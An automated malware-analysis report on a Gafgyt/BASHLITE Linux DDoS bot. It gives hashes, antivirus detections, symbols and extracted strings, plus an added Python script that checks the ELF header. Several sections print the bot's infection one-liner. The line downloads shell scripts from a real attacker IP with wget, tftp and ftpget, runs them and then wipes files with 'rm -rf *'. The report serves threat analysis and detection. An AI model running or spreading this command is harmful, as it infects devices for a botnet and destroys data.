Report #1587

Binary
ABI
ELFOSABI_SYSV
Size
92.73KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
a6b402a0046c6576b9f6256a69173fe1
sha1
3994150b50d6fb9369576cbf30ae7ce50de8df02
crc32
0x47493965
sha224
554158a30699cf4a363b635c8c915f332a2a93707f69b44e364e4404
sha256
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410
sha384
d4dd30a52e74d7ee82e6544c8cbf936afd9e03db06fdcf884ef76c25f962ad48375c972d2931708c856e2ae47ab058c7
sha512
30074a938996c957778f6082b0cafbdaea5cce983861e4a944f7a7a848806ce71397c982399de544d3b74e3037fda6e555d2df8358b217bc7e20e239e1645a51
ssdeep
1536:jWssyGlQMlPkNVjQWTnT/GzE6pSWGM/tUl8eJD+3DkqsXhQENi786SZhA5Aem77k:0ydMlPkNVjQWTz8ztlUl8eJD+oqihQEC
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf (note: maldoc_getEIP_method_1 only matches the generic "call $+5; pop reg" get-PC sequence, which ordinary 32-bit x86 code contains as well, so on an ELF it carries little weight by itself)

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/cpuinfo, /proc/net/route
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *, 185.165.29.47:444, Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4, Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911, Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2, Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285, Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7, BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100, Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36, Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19, Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57), Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
URLs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *
Mails

Suspicious
True
Strings
List
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.47/baws123.sh; chmod 777 baws123.sh; sh baws123.sh; tftp 185.165.29.47 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.47; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.47 troute.sh troute.sh; sh troute.sh; rm -rf baws123.sh troute.sh troute1.sh troute2.sh; rm -rf *
185.165.29.47:444
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
User-Agent: %s
Network is down
Machine is not on the network
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
No route to host
Host is down
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Host: %s
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
been_there_done_that.3001
been_there_done_that
_fwrite.c
open.c
write.c
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Too many open files in system
No such device
Object is remote
Link has been severed
Is a named type file
Connection reset by peer
Too many links
Too many open files
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
Operation not permitted
My IP: %s
8.8.8.8
BUILD %s
BUILD %s
[32mEXECUTED
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__nameserver
__open_nameservers
__socketcall
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
__deregister_frame_info_bases
gethostbyname.c
socket_connect
gethostbyname_r
opennameservers.c
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
fflush_unlocked.c
__GI_nanosleep
nanosleep.c
read_etc_hosts_r.c
__socketcall.c
fflush_unlocked
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
socket.c
__nameservers
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
__read_etc_hosts_r
__open_etc_hosts
__get_hosts_byname_r
__GI_socket
sleep.c
sendHTTP
tcpcsum
killall -9 perl
PONG
HTTP
commServer
pipe.c
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Software caused connection abort
Socket operation on non-socket
inet_addr

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, razer.c, c, Q, i.4253, printchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, printf.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.4160, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, spec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1330, _string_syserrmsgs.c, bcopy.c, strtok.c, next_start.1278, isatty.c, tcgetattr.c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, gethostbyname.c, buf.5162, h.5161, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, 
__pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3285, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, __C_ctype_tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, printf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, recv, connect, __encode_question, __GI___uClibc_fini, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, 
__uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, uastrings, __C_ctype_tolower, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, 
inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, __GI_memmove, sendSTD, setstate, __decode_dotted, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, getCores, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, fork, __stdio_rfill, strncat, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, tcgetattr, __C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, strcmp, __nameserver, data_start, __GI_sysconf, __h_errno_location, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, _stdio_term, __GI_vfprintf, __decode_answer, 
__GI_signal, stderr, commServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __libc_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, infectline, macAddress, __GI___errno_location, readUntil, fcntl, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strlen, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname
Number
728
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
(unnamed section 0), .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2 (one identical .comment entry, repeated 164 times)
Identified
164
Suspicious
True
Functions
List
(identical to the Symbols list above, interleaved with empty entries)
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048168
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
73912
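The Entry Point, Program Header and Section Header numbers above are read straight from the 52-byte Elf32_Ehdr at the start of the file. As an added example, not produced by the report's tooling, the following Python decodes that header with struct and runs the consistency checks an analyst applies before trusting the rest of such a report: the fixed entry sizes, both tables lying inside the file, e_shstrndx in range, and any data left over after the section header table. The header bytes are constructed here to carry the values this report lists (ET_EXEC, x86, ELFOSABI_SYSV, entry 0x8048168, phoff 52 with 3 entries of 32 bytes, shoff 73912 with 16 entries of 40 bytes); they are not bytes from the sample, and e_shstrndx = 13 is an assumption taken from .shstrtab's position in the section list above.

```python
import struct

ELF_MAGIC = b"\x7fELF"
ELF_TYPES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
ELF_MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64"}
ELF_OSABIS = {0: "ELFOSABI_SYSV", 3: "ELFOSABI_LINUX"}

# Elf32_Ehdr after the 16-byte e_ident, little-endian:
#   e_type e_machine e_version e_entry e_phoff e_shoff e_flags
#   e_ehsize e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
EHDR32 = struct.Struct("<HHIIIIIHHHHHH")
EHDR32_LEN = 16 + EHDR32.size  # 52 bytes
PHDR32_LEN, SHDR32_LEN = 32, 40


def parse_elf32_header(data):
    """Decode a little-endian ELF32 header into the fields an analysis report shows."""
    if len(data) < EHDR32_LEN or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data, ei_osabi = data[4], data[5], data[7]
    if ei_class != 1 or ei_data != 1:
        raise ValueError("only little-endian ELFCLASS32 is handled here")
    f = EHDR32.unpack_from(data, 16)
    return {
        "wordsize": 32,
        "osabi": ELF_OSABIS.get(ei_osabi, f"unknown({ei_osabi})"),
        "type": ELF_TYPES.get(f[0], f"unknown({f[0]})"),
        "machine": ELF_MACHINES.get(f[1], f"unknown({f[1]})"),
        "version": "EV_CURRENT" if f[2] == 1 else f"unknown({f[2]})",
        "entry": f[3], "phoff": f[4], "shoff": f[5], "flags": f[6],
        "ehsize": f[7], "phentsize": f[8], "phnum": f[9],
        "shentsize": f[10], "shnum": f[11], "shstrndx": f[12],
    }


def header_checks(h, file_size):
    """Consistency checks of the header against the on-disk size; an empty list is clean."""
    findings = []
    if h["ehsize"] != EHDR32_LEN:
        findings.append(f"e_ehsize {h['ehsize']} != {EHDR32_LEN}")
    if h["phnum"] and h["phentsize"] != PHDR32_LEN:
        findings.append(f"e_phentsize {h['phentsize']} != {PHDR32_LEN}")
    if h["phoff"] + h["phnum"] * h["phentsize"] > file_size:
        findings.append("program header table runs past end of file")
    if h["shnum"] == 0:
        findings.append("no section headers (stripped or packed)")
        return findings
    if h["shentsize"] != SHDR32_LEN:
        findings.append(f"e_shentsize {h['shentsize']} != {SHDR32_LEN}")
    if h["shstrndx"] >= h["shnum"]:
        findings.append("e_shstrndx out of range")
    sh_end = h["shoff"] + h["shnum"] * h["shentsize"]
    if sh_end > file_size:
        findings.append("section header table runs past end of file")
    elif sh_end < file_size:
        findings.append(f"{file_size - sh_end} bytes follow the section header table")
    return findings


def report_sample_header():
    """Constructed 52-byte header carrying this report's values (not bytes from the sample);
    e_shstrndx = 13 assumes .shstrtab is section 13, its position in the section list."""
    # e_ident: magic, ELFCLASS32, ELFDATA2LSB, EV_CURRENT, ELFOSABI_SYSV, ABI version 0, padding
    e_ident = ELF_MAGIC + bytes([1, 1, 1, 0, 0]) + bytes(7)
    return e_ident + EHDR32.pack(2, 3, 1, 0x8048168, 52, 73912, 0, 52, 32, 3, 40, 16, 13)


if __name__ == "__main__":
    hdr = parse_elf32_header(report_sample_header())
    print(hdr)
    # 92.73 KB as the report lists it, taken as 1024-byte units
    print(header_checks(hdr, 94955))
```

One check worth running against the numbers on this page: 73912 + 16 x 40 = 74552 bytes is where the section header table ends, while the report lists the file as 92.73KB. If that is the on-disk size, roughly 18 to 20 KB follow the section header table whether KB means 1000 or 1024 bytes, which a practitioner would want to account for (appended data, or simply the tool measuring something other than the file length) before relying on the section list as a complete map of the binary.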
AVclass
gafgyt
1
VirusTotal
md5
a6b402a0046c6576b9f6256a69173fe1
sha1
3994150b50d6fb9369576cbf30ae7ce50de8df02
SCANS (DETECTION RATE = 64.41%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20190426
version: 18.4.3895.0
detected: True

CMC
update: 20190321
version: 1.1.0.977
detected: False

MAX
result: malware (ai score=100)
update: 20190426
version: 2018.9.12.1
detected: True

Bkav
update: 20190425
version: 1.3.0.9899
detected: False

K7GW
update: 20190426
version: 11.40.30717
detected: False

ALYac
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 1.1.1.5
detected: True

Avast
result: ELF:DDoS-Y [Trj]
update: 20190426
version: 18.4.3895.0
detected: True

Avira
result: LINUX/Gafgyt.quwkf
update: 20190425
version: 8.3.3.8
detected: True

Baidu
update: 20190318
version: 1.0.0.2
detected: False

Cyren
update: 20190426
version: 6.2.0.1
detected: False

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20190426
version: 7.0.34.11020
detected: True

GData
result: Linux.Trojan.Gafgyt.A
update: 20190426
version: A:25.21682B:25.14938
detected: True

Panda
update: 20190425
version: 4.6.4.2
detected: False

VBA32
update: 20190425
version: 4.0.0
detected: False

Zoner
update: 20190425
version: 1.0
detected: False

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20190425
version: 0.101.2.0
detected: True

Comodo
result: Malware@#22jqy9nw4gy2i
update: 20190426
version: 30773
detected: True

F-Prot
update: 20190426
version: 4.7.1.166
detected: False

Ikarus
result: Trojan.Linux.Tsunami
update: 20190425
version: 0.1.5.2
detected: True

McAfee
result: RDN/Generic BackDoor
update: 20190426
version: 6.0.6.653
detected: True

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20190426
version: 25.0.0.24
detected: True

Sophos
result: Linux/DDoS-BI
update: 20190426
version: 4.98.0
detected: True

Yandex
update: 20190425
version: 5.5.1.3
detected: False

Zillya
result: Backdoor.Gafgyt.Linux.9967
update: 20190424
version: 2.0.0.3803
detected: True

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 1.0.0.845
detected: True

Babable
update: 20190424
version: 9107201
detected: False

FireEye
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 29.7.0.0
detected: True

TACHYON
update: 20190426
version: 2019-04-26.02
detected: False

Tencent
result: backdoor.linux.gafgyt.y
update: 20190426
version: 1.0.0.1
detected: True

ViRobot
update: 20190426
version: 2014.3.20.0
detected: False

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 3.0.5.370
detected: True

AegisLab
result: Trojan.Linux.Generic.m!c
update: 20190426
version: 4.2
detected: True

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20190426
version: 2018.4.0.1029
detected: True

F-Secure
result: Malware.LINUX/Gafgyt.quwkf
update: 20190425
version: 12.0.86.52
detected: True

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190426
version: 5.4.247.0
detected: True

Jiangmin
result: Backdoor.Linux.xna
update: 20190426
version: 16.0.100
detected: True

Kingsoft
update: 20190426
version: 2013.8.14.323
detected: False

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190426
version: 3.15.0.23609
detected: True

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.af
update: 20190425
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20190426
version: 15.0.1.13
detected: True

MaxSecure
update: 20190426
version: 1.0.0.1
detected: False

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190425
version: 1.1.15900.4
detected: True

Qihoo-360
result: Win32/Backdoor.3e0
update: 20190426
version: 1.0.0.1120
detected: True

TheHacker
update: 20190421
version: 6.8.0.5.4174
detected: False

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.af
update: 20190426
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190426
version: 19256
detected: True

TrendMicro
result: Backdoor.Linux.BASHLITE.SMJC
update: 20190426
version: 10.0.0.1040
detected: True

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 7.2
detected: True

K7AntiVirus
update: 20190426
version: 11.40.30717
detected: False

SentinelOne
result: DFI - Malicious ELF
update: 20190420
version: 1.0.25.316
detected: True

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20190425
version: 190425-02
detected: True

Malwarebytes
update: 20190426
version: 2.1.1.1115
detected: False

TotalDefense
update: 20190426
version: 37.1.62.1
detected: False

CAT-QuickHeal
update: 20190425
version: 14.00
detected: False

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190426
version: 1.0.134.24788
detected: True

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190426
version: 14.0.297.0
detected: True

SUPERAntiSpyware
update: 20190423
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20190426
version: v2017.3010
detected: True

TrendMicro-HouseCall
result: Backdoor.Linux.BASHLITE.SMJC
update: 20190426
version: 10.0.0.1040
detected: True

total
59
sha256
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410
scan_id
4cffb742e51297c5b5d1c6f785c7125bad60259921e60847ec3246cfeb615410-1556259687
resource
a6b402a0046c6576b9f6256a69173fe1
positives
38
scan_date
2019-04-26 06:21:27
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291 execve("./malware", ["./malware"], [/* 15 vars */]) = 0
4291 ioctl(0, TCGETS, 0xfffc0e90) = -1 ENOTTY (Inappropriate ioctl for device)
